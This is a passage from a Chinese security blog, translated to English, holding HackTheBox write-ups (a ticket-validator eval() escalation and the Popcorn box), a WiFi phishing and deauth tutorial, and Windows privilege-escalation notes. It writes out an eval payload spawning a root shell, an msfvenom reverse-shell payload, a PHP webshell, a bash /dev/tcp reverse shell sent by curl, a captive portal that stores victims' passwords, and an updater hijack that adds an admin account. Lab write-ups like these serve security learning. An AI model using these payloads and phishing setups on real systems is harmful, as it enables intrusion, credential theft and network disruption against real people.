class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#Skytrain Inc Ticket Validation System 0.1</span><br><span class="hljs-comment">#Do not distribute this file.</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">load_file</span>(<span class="hljs-params">loc</span>):<br>    <span class="hljs-keyword">if</span> loc.endswith(<span class="hljs-string">".md"</span>):<br>        <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(loc, <span class="hljs-string">'r'</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">"Wrong file type."</span>)<br>        exit()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">evaluate</span>(<span class="hljs-params">ticketFile</span>):<br>    <span class="hljs-comment">#Evaluates a ticket to check for ireggularities.</span><br>    code_line = <span class="hljs-literal">None</span><br>    <span class="hljs-keyword">for</span> i,x <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(ticketFile.readlines()):<br>        <span class="hljs-keyword">if</span> i == <span class="hljs-number">0</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> x.startswith(<span class="hljs-string">"# Skytrain Inc"</span>):<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>            <span class="hljs-keyword">continue</span><br>        <span class="hljs-keyword">if</span> i == <span class="hljs-number">1</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> x.startswith(<span class="hljs-string">"## Ticket to "</span>):<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Destination: <span class="hljs-subst">{<span class="hljs-string">' '</span>.join(x.strip().split(<span class="hljs-string">' '</span>)[<span class="hljs-number">3</span>:])}</span>"</span>)<br>            <span class="hljs-keyword">continue</span><br><br>        <span class="hljs-keyword">if</span> x.startswith(<span class="hljs-string">"__Ticket Code:__"</span>):<br>            code_line = i+<span class="hljs-number">1</span><br>            <span class="hljs-keyword">continue</span><br><br>        <span class="hljs-keyword">if</span> code_line <span class="hljs-keyword">and</span> i == code_line:<br>            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> x.startswith(<span class="hljs-string">"**"</span>):<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>            ticketCode = x.replace(<span class="hljs-string">"**"</span>, <span class="hljs-string">""</span>).split(<span class="hljs-string">"+"</span>)[<span class="hljs-number">0</span>]<br>            <span class="hljs-keyword">if</span> <span class="hljs-built_in">int</span>(ticketCode) % <span class="hljs-number">7</span> == <span class="hljs-number">4</span>:<br>                validationNumber = <span class="hljs-built_in">eval</span>(x.replace(<span class="hljs-string">"**"</span>, <span class="hljs-string">""</span>))<br>                <span class="hljs-keyword">if</span> validationNumber > <span class="hljs-number">100</span>:<br>                    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br>                <span class="hljs-keyword">else</span>:<br>                    <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    fileName = <span class="hljs-built_in">input</span>(<span class="hljs-string">"Please enter the path to the ticket file.\n"</span>)<br>    ticket = load_file(fileName)<br>    <span class="hljs-comment">#DEBUG print(ticket)</span><br>    result = evaluate(ticket)<br>    <span class="hljs-keyword">if</span> (result):<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">"Valid ticket."</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">"Invalid ticket."</span>)<br>    ticket.close<br><br>main()<br></code></pre></td></tr></table></figure><p>Reading the script: it asks for the path of a <code>.md</code> file whose first line must start with <code># Skytrain Inc</code> and whose second line must start with <code>## Ticket to </code>. After a line beginning <code>__Ticket Code:__</code>, the next line must start with <code>**</code>; the <code>**</code> are stripped, the text before the first <code>+</code> is converted with int() and must leave remainder 4 when divided by 7, and only then is the whole line handed to eval(). eval() executes arbitrary Python, and the script runs as root via sudo, so the goal is to reach that call with an expression of our choosing. Hence the following ticket file:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">vim test.md<br>sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py<br></code></pre></td></tr></table></figure><p>To be honest, I did not understand the boolean expression in the payload below, and the write-ups online do not explain it either.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># Skytrain Inc</span><br><span class="hljs-comment">## Ticket to abc</span><br>__Ticket Code:__<br>**<span class="hljs-number">11</span>+<span class="hljs-number">10</span>==<span class="hljs-number">21</span> <span class="hljs-keyword">and</span> <span class="hljs-built_in">__import__</span>(<span class="hljs-string">'os'</span>).system(<span class="hljs-string">'/bin/bash'</span>) == <span class="hljs-literal">False</span><br></code></pre></td></tr></table></figure><p>Privilege escalation succeeded! (P.S. Don't forget to change into root's home directory for the flag!)</p><p><img src="https://i.loli.net/2021/11/19/srZuV4nzb2iFKTS.png"></p><p><img src="https://i.loli.net/2021/11/19/ls69vS4TmHuOAFJ.png"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>There is more than one way through this box. In the privilege-escalation step, for example, the Markdown file could instead contain a bash reverse-shell one-liner, with nc listening on the attacker machine, which also yields a root shell. In my view the hardest part of the box is the Python code review; only once the script is understood can the escalation be done. Finally, the completion screenshot!</p><p><img src="https://i.loli.net/2021/11/19/vizDc8JneAwtCsb.png"></p>]]></content>
<categories>
<category>Target Practice Notes</category>
</categories>
<tags>
<tag>HackTheBox</tag>
</tags>
</entry>
<entry>
<title>HackTheBox--Popcorn</title>
<link href="/2021/11/08/HackTheBox-Popcorn/"/>
<url>/2021/11/08/HackTheBox-Popcorn/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h2><p>This is a medium-difficulty box from Hack The Box's retired machines; a VIP subscription is needed to play it. For a beginner like me it was still quite challenging, so I am writing this write-up to record it.</p><h2 id="正文"><a href="#正文" class="headerlink" title="Main Part"></a>Main Part</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="Information Gathering"></a>Information Gathering</h3><p>Start with an nmap scan:</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dns">nmap -Pn -<span class="hljs-keyword">A</span> <span class="hljs-number">10.10.10.6</span><br></code></pre></td></tr></table></figure><p>The scan shows a web service and an FTP service. FTP turned out to be useless, so I started from the web service. Visiting the IP address showed only the default page, so I brute-forced directories with dirbuster (the smallest wordlist is enough here; the wordlists live by default in <code>/usr/share/dirbuster/wordlists</code>):</p><p><img src="https://s2.loli.net/2022/09/17/6ZtJpUaWn8qr941.png" alt="img"></p><p>Configure it as in the screenshot below and start the brute force. First brute-force the second-level directories under the web root:</p><p><img src="https://s2.loli.net/2022/09/17/XHYvrKBJVDaPwnf.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/17/8FD45tBWCbUhXp9.png" alt="img"></p><p><code>/torrent</code> returns status code 200, which looks promising.</p><h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><p>Visiting it reveals a BitTorrent CMS. Without further ado, let's look for an upload point. It requires a login, so register an arbitrary account (fill in whatever you like):</p><p><img src="https://s2.loli.net/2022/09/17/5N4PrfnF7GimXvY.png" alt="img"></p><p>After registering and logging in, click the <code>upload</code> module. Uploads are restricted to torrent files, and every bypass I tried failed. With no other option, I turned to the third-level directories:</p><p><img src="https://s2.loli.net/2022/09/17/zmedlSsYtjRrFqw.png" alt="img"></p><p>Brute-forcing reveals a <code>databases</code> directory underneath. Inside it is an SQL file, and auditing it yields the administrator's username and password (the password needs to be MD5-cracked):</p><p><img src="https://s2.loli.net/2022/09/17/MTSe6KZG7ujL3ag.png" alt="img"></p><p>That did not seem to be of any use (interested readers may dig into it), so I kept looking for another upload point. Having found none, the only option was to upload a legitimate BitTorrent seed; I chose to download a torrent from the Kali website and upload that.</p><p>After uploading the torrent there is an image upload point:</p><p><img src="https://s2.loli.net/2022/09/17/OvexbTnMqXZAWCN.png" alt="img"></p><p>Below are several ways to get a shell:</p><p><strong>0x01 Generate a shell with msf</strong></p><p>We can use msf to generate a PHP payload:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">msfvenom -p php/meterpreter/reverse_tcp <span class="hljs-attribute">lhost</span>=tun0 <span class="hljs-attribute">lport</span>=6666 -f<span class="hljs-built_in"> raw </span>> shell.php<br></code></pre></td></tr></table></figure><p>Rename the file to <code>shell.php.jpg</code> to bypass the first filter, then intercept the request with Burp Suite and change the filename back:</p><p><img src="https://s2.loli.net/2022/09/17/vcWGUiwxHOetDrX.png" alt="img"></p><p>Go to the brute-forced <code>/torrent/upload</code> directory, find the webshell just uploaded, open it (note that it was renamed) and refresh; with the handler options set in msf, you get the reverse shell.</p><p>Upload succeeded:</p><p><img src="https://s2.loli.net/2022/09/17/JnZG2ImBNje8HuV.png" alt="img"></p><p><strong>0x02 bash one-liner, listening with netcat</strong></p><p>Upload the one-line webshell <code><?php @system($_POST['cmd']);?></code> the same way, change the extension in Burp, and connect to the one-liner with bash:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">curl http:<span class="hljs-regexp">//</span><span class="hljs-number">10.10</span>.<span class="hljs-number">10.6</span><span class="hljs-regexp">/木马路径 --data-urlencode "cmd=bash -c 'bash -i >& /</span>dev<span class="hljs-regexp">/tcp/</span>kali内网ip/端口 <span class="hljs-number">0</span>>&<span class="hljs-number">1</span><span class="hljs-string">'"</span><br></code></pre></td></tr></table></figure><p>Listen for the reverse shell with nc.</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nc</span> -lvnp <span class="hljs-number">6666</span><br></code></pre></td></tr></table></figure><p>A pseudo-terminal from Python's built-in pty module is recommended:</p><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">python -c <span class="hljs-symbol">'import</span> pty;pty.spawn(<span class="hljs-string">"/bin/bash"</span>)'<br></code></pre></td></tr></table></figure><p><strong>0x03 Download a PHP reverse shell from GitHub</strong></p><p><a href="https://github.com/pentestmonkey/php-reverse-shell">https://github.com/pentestmonkey/php-reverse-shell</a></p><p>Once you have the www user's privileges, user.txt is easy to find (I forgot to take a screenshot).</p><h3 id="权限提升"><a href="#权限提升" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h3><p>With a shell, follow the usual routine: <code>uname -a</code> to see the current kernel version, <code>lsb_release -a</code> to see the distribution, then search online for related exploits; there are several privilege-escalation exploits, Dirty COW among them. Upload the C source to the server and compile it. The upload method can be the same as before, but uploaded files get renamed, so I thought of the following ways to upload the exploit:</p><p><strong>0x01 Put the exploit on my VPS and download it with wget from the reverse shell</strong></p><p><strong>0x02 Upload the file with scp (failed)</strong></p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs elixir">scp root<span class="hljs-variable">@10</span>.<span class="hljs-number">10.14</span>.<span class="hljs-number">3</span><span class="hljs-symbol">:/home/kali/Desktop/tiquan</span>.c /tiquan.c <span class="hljs-comment">#the first path is the exploit on Kali, the second is the path on the target</span><br></code></pre></td></tr></table></figure><p>This method failed, reportedly because the reverse shell cannot run the scp command.</p><p>Finally, following a hint from an expert, I used Python's http module:</p><figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs axapta">python3 -m http.<span class="hljs-keyword">server</span> 端口 <span class="hljs-meta">#python3</span><br>python -m SimpleHTTPServer 端口 <span class="hljs-meta">#python2</span><br></code></pre></td></tr></table></figure><p>Download it on the target with wget:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget http:<span class="hljs-regexp">//</span>kali的内网ip:端口/exp.c<br></code></pre></td></tr></table></figure><p>Compile and run on the target:</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs 1c">gcc <span class="hljs-built_in">exp</span>.c -o <span class="hljs-built_in">exp</span> <br>chmod +x <span class="hljs-built_in">exp</span><br>./<span class="hljs-built_in">exp</span><br></code></pre></td></tr></table></figure><p>Here I hit an error (switching to <a href="https://www.exploit-db.com/exploits/14339">the exploit from the official write-up</a> produced a permission-denied message):</p><p><img src="https://s2.loli.net/2022/09/17/VBu7rGOCUH8linL.png" alt="img"></p><p>Since neither this exploit nor the one from the official write-up works, let's try <a href="https://www.exploit-db.com/exploits/40847">Dirty COW</a>:</p><p><a href="https://www.exploit-db.com/exploits/40847">https://www.exploit-db.com/exploits/40847</a></p><p>Various compile errors; failed.</p><p>After reading an expert's blog, I found that only the exploit below succeeds:</p><p><a href="https://www.exploit-db.com/exploits/40839">https://www.exploit-db.com/exploits/40839</a></p><p>Note the compile command here, which needs extra flags:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">gcc -pthread dirty.c -o dirty -lcrypt<br>./dirty<br></code></pre></td></tr></table></figure><p>Once compiled, it runs extremely slowly; I don't know why. Log in over SSH with the username from the exploit and the password you set, then go into the root folder to find root.txt. (You must log in via SSH here, otherwise some commands will not run.)</p><p><img src="https://s2.loli.net/2022/09/17/kWuSgsrtyi73co5.png" alt="img"></p><p>Got it!</p><p><img src="https://s2.loli.net/2022/09/17/aLg7HqMO3GrIXuZ.png" alt="img"></p><h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2><p>The steps on this box are fairly close to a real engagement. I think the filtering in the file-upload part is a little simple, so getting a shell is easy. Although there is no internal-network part, the external foothold is still worth savouring. The privilege-escalation part in particular took the longest and ran into the most problems. It also reminds us not to give up easily when we meet such problems in practice but to persist; finding an exploit is not the end of the story.</p>]]></content>
<categories>
<category>Target Practice Notes</category>
</categories>
<tags>
<tag>HackTheBox</tag>
</tags>
</entry>
<entry>
<title>Kali Penetration (3): WiFi Phishing and Deauth Attacks</title>
<link href="/2021/10/31/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-WiFi%E9%92%93%E9%B1%BC%E5%92%8C%E6%96%AD%E7%BD%91%E6%94%BB%E5%87%BB/"/>
<url>/2021/10/31/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-WiFi%E9%92%93%E9%B1%BC%E5%92%8C%E6%96%AD%E7%BD%91%E6%94%BB%E5%87%BB/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h2><p>Recently I was leafing through a book on close-access penetration that I bought last year and came across the section on WiFi phishing. That suddenly got me interested, so I bought two wireless adapters from a Taobao shop (one supporting only the 2.4 GHz band, the other both 2.4 GHz and 5 GHz) to try WiFi phishing.</p><p>Do not break into other people's devices illegally; obey the law. The net of justice is wide, and nothing slips through it.</p><h2 id="正文"><a href="#正文" class="headerlink" title="Main Part"></a>Main Part</h2><p>Since the adapter I bought came with a Kali virtual machine with the environment already configured, I won't explain the setup here.</p><p>I will list several phishing methods, split into two cases: phishing for the WiFi password and phishing for personal information.</p><h3 id="钓鱼获取WiFi密码"><a href="#钓鱼获取WiFi密码" class="headerlink" title="Phishing for the WiFi password"></a>Phishing for the WiFi password</h3><p>Due to limited time I did not get around to taking screenshots; my apologies!</p><p>I use a Kali virtual machine here with the network connection in bridged mode; my eth0 address is 192.168.50.189 (yours will differ).</p><p>We use the airgeddon shell script, which can be downloaded from the 极客之眼 website. When it starts it first checks whether any dependencies are missing; once the check completes, select the external wireless adapter:</p><p><img src="https://s2.loli.net/2022/09/16/Zol9AECnW6HMaLR.png" alt="image-20220916211255839"></p><p>First put the adapter into monitor mode:</p><p><img src="https://s2.loli.net/2022/09/16/asdeoq84vZNOjE1.png" alt="image-20220916211518304.png"></p><p>After choosing "Next", capture a handshake while we are at it:</p><p><img src="https://s2.loli.net/2022/09/16/e3VuoitJDaENBfl.png" alt="image-20220916212218174"></p><p><img src="https://s2.loli.net/2022/09/16/FmWwhdZH6akl4yK.png" alt="image-20220916212246282"></p><p>After pressing "Next" twice, it starts scanning nearby WiFi networks. Once the target WiFi has been found, press Ctrl+C to stop and enter the target's number:</p><p><img src="https://s2.loli.net/2022/09/16/IrAoHnvE2SWgCwG.png" alt="image-20220916212511774"></p><p>Select the deauth attack mode:</p><p><img src="https://s2.loli.net/2022/09/16/4uznilxSWCN5ctd.png" alt="image-20220916212632442"></p><p>After pressing "n" three times, enter the capture time (10-100 seconds) and press Enter; several black windows will appear on screen:</p><p><img src="https://s2.loli.net/2022/09/16/eqUCJrvdhKXAfzR.png" alt="image-20220916212820103"></p><p>Once the handshake has been captured, the script shows where the handshake is saved and where any phished password will be saved:</p><p><img src="https://s2.loli.net/2022/09/16/zpwXQtoK87dFP6E.png" alt="image-20220916213017408"></p><p>Keep pressing Enter, then choose the language of the phishing page (the script was written by foreigners, so there is no Chinese phishing page):</p><p><img src="https://s2.loli.net/2022/09/16/9TfKVD2SqlZdRn7.png" alt="image-20220916213209555"></p><p>Press Enter and several black windows pop up again:</p><p><img src="https://s2.loli.net/2022/09/16/xpnbedrYCmW6AF8.png" alt="image-20220916213442408"></p><p>Meanwhile the target WiFi is under deauth attack, so devices that were connected to it can no longer connect to it and are left with our phishing WiFi instead, where they enter the WiFi password in the phishing page that pops up:</p><p><img src="https://s2.loli.net/2022/09/16/V4Te61hRW9vMJso.jpg"></p><p>If the phished WiFi password matches the handshake, it is displayed where the arrow points:</p><p><img src="https://s2.loli.net/2022/09/16/Vq1fbZATmkhI4c8.png" alt="image-20220916220444006"></p><p>Of course, you can also skip phishing and brute-force the .pcap handshake captured earlier; that depends more on luck.</p><h3 id="钓鱼获取个人信息"><a href="#钓鱼获取个人信息" class="headerlink" title="Phishing for personal information"></a>Phishing for personal information</h3><p>This method can capture not only personal information but also WiFi passwords. Compared with the previous method it supports custom phishing pages, so it offers more possibilities.</p><p>Here I use <a href="https://github.com/hacefresko/EvilPortal.git">EvilPortal</a>, which can be downloaded from GitHub. Enter the folder, run <code>python3 run.py</code> and choose the first option:</p><p><img src="https://s2.loli.net/2022/09/16/o9ramA86gzTCMZ5.png" alt="image-20220916221504561"></p><p>Pick any WiFi SSID (I use FreeWifi as an example) and any channel, set security to "open", and press Enter to start:</p><p><img src="https://s2.loli.net/2022/09/16/oaherRkPXNjTCYf.png" alt="image-20220916221817635"></p><p>When another device connects to this WiFi, it is redirected to the phishing page set up in advance. How do we set up the phishing environment?</p><p>First configure the MySQL environment:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs sql">$ service mysql <span class="hljs-keyword">start</span><br>$ mysql<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> <span class="hljs-keyword">create</span> database fakeap;<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> <span class="hljs-keyword">create</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">user</span>;<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> <span class="hljs-keyword">grant</span> <span class="hljs-keyword">all</span> <span class="hljs-keyword">on</span> fakeap.<span class="hljs-operator">*</span> <span class="hljs-keyword">to</span> <span class="hljs-string">'user'</span>@<span class="hljs-string">'localhost'</span> identified <span class="hljs-keyword">by</span> <span class="hljs-string">'password'</span>;<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> use fakeap<br>MariaDB [fakeap]<span class="hljs-operator">></span> <span class="hljs-keyword">create</span> <span class="hljs-keyword">table</span> accounts(email <span class="hljs-type">varchar</span>(<span class="hljs-number">30</span>), password <span class="hljs-type">varchar</span>(<span class="hljs-number">30</span>));<br>MariaDB [fakeap]<span class="hljs-operator">></span> <span class="hljs-keyword">alter</span> database fakeap <span class="hljs-type">character</span> <span class="hljs-keyword">set</span> <span class="hljs-string">'utf8'</span>;<br>MariaDB [fakeap]<span class="hljs-operator">></span> <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> accounts;<br></code></pre></td></tr></table></figure><p>Once the database is configured, go to <code>/var/www/html/captive</code>, the directory that holds the phishing page. Adapt our phishing page following the existing <code>db.php</code> and start the script; Kali's MySQL and Apache services then start, and phished usernames and passwords are stored in the database. With this method we could phish other students' campus-network accounts and passwords (just kidding).</p><h3 id="断网攻击"><a href="#断网攻击" class="headerlink" title="Deauth attacks"></a>Deauth attacks</h3><p>There are far too many scripts that can be used for DoS deauth attacks; I'll take three of them as examples.</p><p>After plugging in the adapter, first check with the <code>lsusb</code> command that it has been detected properly.</p><h4 id="airgeddon"><a href="#airgeddon" class="headerlink" title="airgeddon"></a>airgeddon</h4><p>The same script as before: put the adapter into monitor mode and choose "4". In practice I found it unreliable, so I don't recommend this script for deauth attacks.</p><h4 id="sparrow-wifi"><a href="#sparrow-wifi" class="headerlink" title="sparrow-wifi"></a>sparrow-wifi</h4><p>This is a GUI tool written in Python and is also simple to use. Enter the folder and run <code>python3 sparrow-wifi.py</code>; a graphical interface appears. Choose "Falcon" - "Advanced Scan" and enable monitor mode:</p><p><img src="https://s2.loli.net/2022/09/16/4dr9SzLFyfhMuEW.png" alt="image-20220916223343208"></p><p><img src="https://s2.loli.net/2022/09/16/x9IMsriqH5NdWe8.png" alt="image-20220916223427101"></p><p>Click "start" to begin scanning. Once the target WiFi appears, click "Stop scanning", right-click the target WiFi in the list below and choose the option the arrow points to (the one below it captures the WPA handshake):</p><p><img src="https://s2.loli.net/2022/09/16/ScRB1odiXzU9L72.png" alt="image-20220916223653515"></p><p>Choose "yes" in the dialog that pops up to start the attack; to stop it, right-click the target WiFi and choose "Stop deauth":</p><p><img src="https://s2.loli.net/2022/09/16/C9UzlmMI81k7AEF.png" alt="image-20220916223945748"></p><h4 id="wifidos"><a href="#wifidos" class="headerlink" title="wifidos"></a>wifidos</h4><p>This script is even simpler to use; it is also written in Python and has only a CUI. Select the wireless adapter and the target WiFi and the attack starts:</p><p><img src="https://s2.loli.net/2022/09/16/WwVjg6kANH325eQ.png" alt="image-20220916224315125"></p><p>Press Ctrl+C twice to stop the attack. If you want this script, leave a comment or send me an email.</p><h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2><p>That is the end of this tutorial. Finally, a reminder to everyone not to do anything illegal. Thank you!</p>]]></content>
<categories>
<category>Wireless Security</category>
</categories>
<tags>
<tag>Kali Penetration</tag>
</tags>
</entry>
<entry>
<title>Windows and Linux Privilege Escalation</title>
<link href="/2021/10/29/Windows%E5%92%8CLinux%E7%B3%BB%E7%BB%9F%E6%8F%90%E6%9D%83/"/>
<url>/2021/10/29/Windows%E5%92%8CLinux%E7%B3%BB%E7%BB%9F%E6%8F%90%E6%9D%83/</url>
<content type="html"><![CDATA[<h2 id="Windows提权"><a href="#Windows提权" class="headerlink" title="Windows privilege escalation"></a>Windows privilege escalation</h2><h3 id="内核补丁提权"><a href="#内核补丁提权" class="headerlink" title="Kernel patch privilege escalation"></a>Kernel patch privilege escalation</h3><p>Run the <code>systeminfo</code> command on the target machine and paste the output into the following website.</p><p>Privilege-escalation helper site: <a href="http://bugs.hacking8.com/tiquan/">http://bugs.hacking8.com/tiquan/</a></p><h3 id="数据库提权"><a href="#数据库提权" class="headerlink" title="Database privilege escalation"></a>Database privilege escalation</h3><p>Because it is too long, I wrote a separate article on it; for the specific methods, see my other post.</p><h3 id="计划任务提权"><a href="#计划任务提权" class="headerlink" title="Scheduled task privilege escalation"></a>Scheduled task privilege escalation</h3><p>Windows' built-in scheduled tasks come in two kinds, <code>at</code> and <code>schtasks</code>.</p><p><strong>AT privilege escalation</strong>: a logic abuse applicable to systems older than Windows 7; create a new task that runs the specified file at the specified time and it is granted SYSTEM privileges</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">at <span class="hljs-number">20</span>:<span class="hljs-number">55</span> /interactive cmd.exe<br></code></pre></td></tr></table></figure><p><strong>SC reverse shell (create a service)</strong>: bind cmd as the service executable; starting it pops a SYSTEM shell</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">sc</span> Create syscmd binPath= <span class="hljs-string">"cmd /K start"</span> <span class="hljs-built_in">type</span>= own <span class="hljs-built_in">type</span>= interact<br><span class="hljs-built_in">sc</span> <span class="hljs-built_in">start</span> syscmd<br></code></pre></td></tr></table></figure><p><strong>PS privilege escalation (Windows 2008 only):</strong> requires PsTools/psexec to be installed on the Windows host; just allow it to run</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">psexec.exe <span class="hljs-literal">-accepteula</span> <span class="hljs-literal">-s</span> <span class="hljs-literal">-i</span> <span class="hljs-literal">-d</span> notepad.exe<br></code></pre></td></tr></table></figure><h3 id="DLL劫持提权"><a href="#DLL劫持提权" class="headerlink" title="DLL hijacking privilege escalation"></a>DLL hijacking privilege escalation</h3><p>Windows programs need DLLs (dynamic-link libraries) when they start. If such a DLL does not exist, privileges can be escalated by placing a malicious DLL in the location where the application looks for it. Windows applications normally have a predefined DLL search path and search in the following order:</p><p>1. The directory the application was loaded from</p><p>2. C:\Windows\System32</p><p>3. C:\Windows\System</p><p>4. C:\Windows</p><p>5. The current working directory (CWD)</p><p>6. The directories in the PATH environment variable (system first, then user)</p><p>This load order makes it very easy for a system DLL to be hijacked: the attacker only needs to place the target file and the malicious DLL together so that the malicious DLL is loaded before the system one. Because system DLLs are so common, a large amount of software was affected by this load order at the time.</p><h4 id="lpk-dll提权"><a href="#lpk-dll提权" class="headerlink" title="lpk.dll privilege escalation"></a>lpk.dll privilege escalation</h4><p>The system's own lpk.dll lives in C:\WINDOWS\system32 and C:\WINDOWS\system\dllcache. The typical behaviour of the lpk.dll virus is to infect directories containing executables and hide itself, regenerating after deletion; when an exe in the same directory runs, Windows dynamically links lpk.dll, activating the virus, so it cannot be cleaned up completely.</p><p>Here we use the small DLL privilege-escalation tool written by the t00ls forum, T00ls Lpk Sethc v4 (be sure to turn off antivirus while using it). The prerequisite is that the target server has Remote Desktop enabled (not necessarily on port 3389; use the <code>tasklist /svc</code> command to find the PID and then <code>netstat -ano</code> to find the corresponding port).</p><p>With a webshell in hand, upload lpk.dll to a directory on the target server that contains an exe; when that exe runs, it dynamically links lpk.dll. When the user restarts the machine, lpk.dll hijacks the remote connection. Then press Shift five times to trigger the backdoor while holding Ctrl together with the two configured hotkeys, and a password box pops up. What follows is easy; with a graphical interface anyone can do it.</p><h3 id="第三方软件提权"><a href="#第三方软件提权" class="headerlink" title="Third-party software privilege escalation"></a>Third-party software privilege escalation</h3><p>Third-party software privilege escalation exploits vulnerabilities in third-party software to obtain a higher privilege.</p><h4 id="搜狗输入法提权"><a href="#搜狗输入法提权" class="headerlink" title="Sogou Input Method privilege escalation"></a>Sogou Input Method privilege escalation</h4><p>Sogou Input Method auto-updates by default (few people change this setting), the updater runs the exe during an input-method upgrade without any verification, and for the convenience of updating the folder it lives in has read, write and execute permissions fully open by default. As a result we can upload a malicious exe compiled from a bat script, replace the original updater with it, and carry out privilege escalation.</p><p>With a webshell obtained, find Sogou's path on one of the drives: x:\Program Files\SogouInput.</p><p>Write the following batch script (here the example creates a user and adds it to the administrators group):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">@<span class="hljs-built_in">echo</span> off<br>@net user hack hack123 /add<br>@net localgroup administrators hack /add<br></code></pre></td></tr></table></figure><p>Compile it into an exe with Quick Batch File Compiler, upload our PinyinUp.exe, and rename the PinyinUp that was in the Sogou path. When the server administrator updates the dictionary, our PinyinUp.exe is called and runs the commands from the bat script we wrote earlier, i.e. it adds the hack user to the administrators group.</p><h4 id="迅雷提权"><a href="#迅雷提权" class="headerlink" title="Thunder (Xunlei) privilege escalation"></a>Thunder (Xunlei) privilege escalation</h4><p>Every time we use Thunder to download a file from a web page, Thunder automatically calls the geturl.htm and getAllurl.htm files in its install directory to obtain download links, torrents and other resources. We can exploit this by modifying those two files in the install directory. Moreover, the install directory has all permissions open, which makes escalation easier. As before, the install directory has to be located through the webshell.</p><p>Append the following VBScript to the end of either file:</p><figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs vbscript"><script language=<span class="hljs-string">"VBScript"</span>><br><span 